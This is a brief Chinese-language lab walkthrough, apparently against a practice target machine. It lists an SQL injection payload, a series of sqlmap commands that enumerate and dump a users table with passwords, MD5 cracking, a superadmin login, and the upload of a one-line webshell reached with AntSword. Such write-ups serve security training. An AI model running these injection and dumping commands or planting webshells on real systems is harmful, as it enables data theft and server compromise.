1.先进行端口扫面,扫面和我们同一网段的靶机
2.找出靶机的ip
3.看看他有些什么目录
4.访问这些文件后我们先创建一个账户并登录
5.登录后输入sql语句' or 1=1#获得下图数据
6.再输入1进行抓包
7.用sqlmap验证是否存在sql注入
sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" -- cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum" --level=3
8.查所有数据库
sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" --cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum" --dbs
9.查当前数据库
sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" --cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum" --current-db
10.查数据库中的表
sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" --cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum" -D webapphacking --tables
10.查users表中的列
sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" --cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum" -D webapphacking -T users --columns
11.查出所有数据
sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" --cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum" -D webapphacking -T users -C name,user,address,id,pasword --dump
12.使用MD5解密方法对密码进行解密
13.登录解密后的超级管理员用户(superadmin)
14.登录后上传一句话木马
15成功上传
16.复制文件地址用蚁剑成功连接